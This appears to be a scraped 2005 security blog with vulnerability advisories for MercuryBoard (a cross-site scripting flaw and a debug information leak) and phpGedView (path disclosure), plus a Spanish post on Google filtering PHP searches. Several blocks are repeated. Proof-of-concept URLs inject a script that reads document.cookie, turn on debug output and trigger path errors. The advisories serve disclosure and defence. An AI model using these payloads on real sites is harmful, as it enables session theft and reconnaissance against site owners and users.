################################################
Mercuryboard 1.0.x & 1.1.x forum.php f variable XSS
vendor url: http://www.mercuryboard.com
advisore:http://lostmon.blogspot.com/2005/02/
mercuryboard-forumphp-f-variable-xss.html
exploit avaible :yes vendor: emailed
OSVDB ID 13764
Secunia:SA13937
Securitytracker:1013223
################################################
MercuryBoard is a powerful message board system dedicated to raw speed with a mixture of features, ease of use, and ease of customization coupled with expandability, and diverse language services
Mercuryboard contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate 'f' variable upon submission to the 'forun.php' script.This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.
afected versions :
1.0.x
1.1.x
Proof of concept
http://[victim]/index.php?a=forum&f='%3E%3Cscript%3Ealert
(document.cookie)%3C/script%3E
http://[victim]/index.php?a=forum&f='><script>alert
(document.cookie)</script>
impact:
Loss of confidenciality
Information disclosure
path disclosure
imput manipulation.
solution:
Currently, there are no known upgrades, patches, or workarounds available to correct this
issue.
release time :
discovered : 2005-02-13
Email to vendor: 2005-02-13
disclosure date: 2005-02-16
Atentamente:
Lostmon (lostmon@gmail.com)
Thnx to estrella Ke tailoviu un monton :P
thnx to all for the support.
http://Lostmon.blogsport.com/
--
La curiosidad es lo que hace mover la mente....
Mercuryboard debug information disclosure
Monday, February 14, 2005
################################################
Mercuryboard 1.0.x & 1.1.x debug information disclosure
vendor url: http://www.mercuryboard.com
advisore:http://lostmon.blogspot.com/2005/02/
mercuryboard-debug-information.html
OSVDB ID:13787
exploit avaible :yes vendor: emailed
Secunia:SA14284
Securitytracker:1013626
################################################
MercuryBoard is a powerful message board system dedicated to raw speed with a mixture of features, ease of use, and ease of customization coupled with expandability, and diverse language services
Mercuryboard contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a any user manipulates the imputs in the url and added \&debug=1 at url or concatenate &debug=1, occurs, which will disclose all sql querys ,all files are in use ,path disclosure, and what templates used this information resulting in a loss of confidentiality.
afected versions :
1.0.x
1.1.x
1.1.3 not afected
Proof of concept
http://[target]/index.php?a=forum&f=\&debug=1
http://[target]/index.php?a=\&debug=1
http://[target]/index.php?a=&debug=1
http://[target]/index.php?a=forum&debug=1
http://[target]/index.php?c=&debug=1
impact:
Loss of confidenciality
Information disclosure
path disclosure
imput manipulation.
solution:
need to update tu version 1.1.3 this issue is solved in this version
release time :
Discovered : 2005-02-13
Email to vendor: 2005-02-13
disclosure date: 2005-02-14
updated : 2005-04-02
Atentamente:
Lostmon (lostmon@gmail.com)
Thnx to estrella Ke tailoviu un monton :P
thnx to http://www.hispanew.com for support.
http://Lostmon.blogsport.com/
--
La curiosidad es lo que hace mover la mente....
Mercuryboard 1.0.x & 1.1.x debug information disclosure
vendor url: http://www.mercuryboard.com
advisore:http://lostmon.blogspot.com/2005/02/
mercuryboard-debug-information.html
OSVDB ID:13787
exploit avaible :yes vendor: emailed
Secunia:SA14284
Securitytracker:1013626
################################################
MercuryBoard is a powerful message board system dedicated to raw speed with a mixture of features, ease of use, and ease of customization coupled with expandability, and diverse language services
Mercuryboard contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a any user manipulates the imputs in the url and added \&debug=1 at url or concatenate &debug=1, occurs, which will disclose all sql querys ,all files are in use ,path disclosure, and what templates used this information resulting in a loss of confidentiality.
afected versions :
1.0.x
1.1.x
1.1.3 not afected
Proof of concept
http://[target]/index.php?a=forum&f=\&debug=1
http://[target]/index.php?a=\&debug=1
http://[target]/index.php?a=&debug=1
http://[target]/index.php?a=forum&debug=1
http://[target]/index.php?c=&debug=1
impact:
Loss of confidenciality
Information disclosure
path disclosure
imput manipulation.
solution:
need to update tu version 1.1.3 this issue is solved in this version
release time :
Discovered : 2005-02-13
Email to vendor: 2005-02-13
disclosure date: 2005-02-14
updated : 2005-04-02
Atentamente:
Lostmon (lostmon@gmail.com)
Thnx to estrella Ke tailoviu un monton :P
thnx to http://www.hispanew.com for support.
http://Lostmon.blogsport.com/
--
La curiosidad es lo que hace mover la mente....
Multiple full path disclosure in phpGedview 3.2 and prior
Tuesday, February 01, 2005
Multiple full path disclosure in phpGedview 3.2 and prior:
PhpGedview is a web based tree for indexing and ordening all geanologic entries.
a user can look and present the information by diferens querys.
This aplication have various imput validations errors
and reveal some data to remote users.
#######################################################
variable 'level' and 'parent[0]'in file 'placelist.php'
#######################################################
if we change the value of the variable 'level' to other was not exit...
http://[target]/phpGedView/placelist.php?level=01
http://[target]/phpGedView/placelist.php?level=4000000000
(number of error lines show)
if we change the value of the array on variable 'parent[0]' to a non
existen array value...or a letter
http://[target]/phpGedView/placelist.php?action=show&level=1
&parent[1]=Click+edit+and+change+me
http://[target]/phpGedView/placelist.php?action=show
&parent[x]=Misnaged&level=0
http://dismarking.freefronthost.com/phpGedView/placelist.php?
action=find&level=1&parent[x]=Click+edit+and+change+me
here if we change the variable 'level' obtain the error again
http://[target]/phpGedView/placelist.php?action=show&parent[x]=
Misnaged&level=4000 (level=4000 number of error lines show)
we can make some convinations...
###########################################################
variable 'pids[0]' in file timeline.php
###########################################################
if we change the value of the array 'pids[0] to a non existant number
or a letter we found again the error.
http://[target]/phpGedView/timeline.php?pids[x]=I2222
###########################################################
variable not defined in file 'help_text.php'
###########################################################
in this file for make an error we need only a invent a variable
(in the example 'lala')
http://[target]/bin/phpgedview/help_text.php?lala=lala
we get aganin full path disclosure.
############################################################
variable 'filename' in 'imageview.php'
############################################################
variable filename is not validate porperly and permits inport
files to other sites.
http://[target]/imageview.php?filename=http://[remote]/logo.gif
and we can obtain again a full path instalation
http://[target]/imageview.php?filename=../ or some invalid data.
############################################################
change name of lenguage by a number causes a sesion crachses
############################################################
wen we change to another language , in the finish of the url we
have the word of language use.
If we change this value for a numbres we crachs the session,
and full path reveal.
http://[target]/phpGedView/individual.php?pid=I1&ged=pruebas2.ged
&changelanguage=yes&NEWLANGUAGE=1
############################################################
atentamente
Lostmon (lostmon@gmail.com)
thnx to estrella to be my light
thnx to all one that believes in my
La curiosidad es lo que hace mover la mente...
PhpGedview is a web based tree for indexing and ordening all geanologic entries.
a user can look and present the information by diferens querys.
This aplication have various imput validations errors
and reveal some data to remote users.
#######################################################
variable 'level' and 'parent[0]'in file 'placelist.php'
#######################################################
if we change the value of the variable 'level' to other was not exit...
http://[target]/phpGedView/placelist.php?level=01
http://[target]/phpGedView/placelist.php?level=4000000000
(number of error lines show)
if we change the value of the array on variable 'parent[0]' to a non
existen array value...or a letter
http://[target]/phpGedView/placelist.php?action=show&level=1
&parent[1]=Click+edit+and+change+me
http://[target]/phpGedView/placelist.php?action=show
&parent[x]=Misnaged&level=0
http://dismarking.freefronthost.com/phpGedView/placelist.php?
action=find&level=1&parent[x]=Click+edit+and+change+me
here if we change the variable 'level' obtain the error again
http://[target]/phpGedView/placelist.php?action=show&parent[x]=
Misnaged&level=4000 (level=4000 number of error lines show)
we can make some convinations...
###########################################################
variable 'pids[0]' in file timeline.php
###########################################################
if we change the value of the array 'pids[0] to a non existant number
or a letter we found again the error.
http://[target]/phpGedView/timeline.php?pids[x]=I2222
###########################################################
variable not defined in file 'help_text.php'
###########################################################
in this file for make an error we need only a invent a variable
(in the example 'lala')
http://[target]/bin/phpgedview/help_text.php?lala=lala
we get aganin full path disclosure.
############################################################
variable 'filename' in 'imageview.php'
############################################################
variable filename is not validate porperly and permits inport
files to other sites.
http://[target]/imageview.php?filename=http://[remote]/logo.gif
and we can obtain again a full path instalation
http://[target]/imageview.php?filename=../ or some invalid data.
############################################################
change name of lenguage by a number causes a sesion crachses
############################################################
wen we change to another language , in the finish of the url we
have the word of language use.
If we change this value for a numbres we crachs the session,
and full path reveal.
http://[target]/phpGedView/individual.php?pid=I1&ged=pruebas2.ged
&changelanguage=yes&NEWLANGUAGE=1
############################################################
atentamente
Lostmon (lostmon@gmail.com)
thnx to estrella to be my light
thnx to all one that believes in my
La curiosidad es lo que hace mover la mente...
Google bloquea la busqueda de archivos php
Monday, January 24, 2005
Esta mañana haciendo una de las busquedas habituales en google
me me encuentro con que supuestamente google bloquea las maquinas
infectadas con spyware.
Explicacion / reproduccion del error :
si hacemos cuatro simples busquedas en google
Inurl:login.html
Esta busqueda nos da unos resultados de 1.200.000.
si clicamos en siguiente , pasamos y vemos la siguiente pagina de resultados.
inurl:login.asp
Esta busqueda arroja unos resultados de 2.240.000 paginas, si clicamos en siguiente vamos sinproblemas a la siguiente pagina de resultados.
inurl:login.aspx
Esta busqueda da unos resultados de 489.000 ,si clicamos en siguiente ,nos deja ver sin problemas la siguiente pagina de resultados
inurl:login.php
Ops!!! Google nos da un mensage de error el cual despues de leerlo nos viene a decir que nuestra maquina esta infectada con spywares y nos recomienta un par de links para descargarnos alguno.
Las busquedas han sido realizadas atraves de Mozilla firefox y atraves de la caja de busqueda del buscador ,no se ha usado la "Google Toolbar"
sea el archivo que sea el que busquemos de esta manera bien sea login.php o bien sea loquequeramos.php Google siempre nos restringe la busqueda de los archivos *.php .
para descartar la incidencia de spywares en las pruebas se ha pasado por la maquina de pruebas los siguientes antispywares :
ad-ware
spybot
www.xpywareinfo.com/xscan.php
hijackthis
y los siguientes antivirus :
f-prot
fsecure
norton antivirus 2005
panda active scan
dando todos ellos resultados negativos con lo cual podemos pensar que la maquina usada esta limpia.
Estos pasos seguidos por google , son la contramedida contra virus como
Santy.a y Spyki.ao algunas posibles variantes de los mismos o nuevos virus basados en las mismas tecnicas de busqueda ,virus que basan su busqueda de sitios vulnerables por los terminos buscados en Google.
Podria tratarse de un nuevo filtro de Google ,al parecer muy automatizaado por las pruebas realizadas.
El usuario que se encuentre con ese mensage de error , aunque no necesariamente quiera decir que este infectado con spyware ,si no esta seguro de estar limpio de ellos deberia escanear su maquina ,para por si acaso descartar esa amenaza.
para ello deberia usar alguno de los programas que eliminan estas "plagas"
ad-ware o Spybot Search&Destroy
Asi mismo recomiendo pasar por las paginas dedicadas a el estudio de virus
para estar al dia como www.vsantivirus.com
Atentamente
Lostmon
thnx to estrella to be my ligth
Thnx to RotteW
Thnx to Jose Luis Lopez por el soporte prestado
--
La curiosidad es lo que hace mover la mente
me me encuentro con que supuestamente google bloquea las maquinas
infectadas con spyware.
Explicacion / reproduccion del error :
si hacemos cuatro simples busquedas en google
Inurl:login.html
Esta busqueda nos da unos resultados de 1.200.000.
si clicamos en siguiente , pasamos y vemos la siguiente pagina de resultados.
inurl:login.asp
Esta busqueda arroja unos resultados de 2.240.000 paginas, si clicamos en siguiente vamos sinproblemas a la siguiente pagina de resultados.
inurl:login.aspx
Esta busqueda da unos resultados de 489.000 ,si clicamos en siguiente ,nos deja ver sin problemas la siguiente pagina de resultados
inurl:login.php
Ops!!! Google nos da un mensage de error el cual despues de leerlo nos viene a decir que nuestra maquina esta infectada con spywares y nos recomienta un par de links para descargarnos alguno.
Las busquedas han sido realizadas atraves de Mozilla firefox y atraves de la caja de busqueda del buscador ,no se ha usado la "Google Toolbar"
sea el archivo que sea el que busquemos de esta manera bien sea login.php o bien sea loquequeramos.php Google siempre nos restringe la busqueda de los archivos *.php .
para descartar la incidencia de spywares en las pruebas se ha pasado por la maquina de pruebas los siguientes antispywares :
ad-ware
spybot
www.xpywareinfo.com/xscan.php
hijackthis
y los siguientes antivirus :
f-prot
fsecure
norton antivirus 2005
panda active scan
dando todos ellos resultados negativos con lo cual podemos pensar que la maquina usada esta limpia.
Estos pasos seguidos por google , son la contramedida contra virus como
Santy.a y Spyki.ao algunas posibles variantes de los mismos o nuevos virus basados en las mismas tecnicas de busqueda ,virus que basan su busqueda de sitios vulnerables por los terminos buscados en Google.
Podria tratarse de un nuevo filtro de Google ,al parecer muy automatizaado por las pruebas realizadas.
El usuario que se encuentre con ese mensage de error , aunque no necesariamente quiera decir que este infectado con spyware ,si no esta seguro de estar limpio de ellos deberia escanear su maquina ,para por si acaso descartar esa amenaza.
para ello deberia usar alguno de los programas que eliminan estas "plagas"
ad-ware o Spybot Search&Destroy
Asi mismo recomiendo pasar por las paginas dedicadas a el estudio de virus
para estar al dia como www.vsantivirus.com
Atentamente
Lostmon
thnx to estrella to be my ligth
Thnx to RotteW
Thnx to Jose Luis Lopez por el soporte prestado
--
La curiosidad es lo que hace mover la mente
Subscribe to:
Posts (Atom)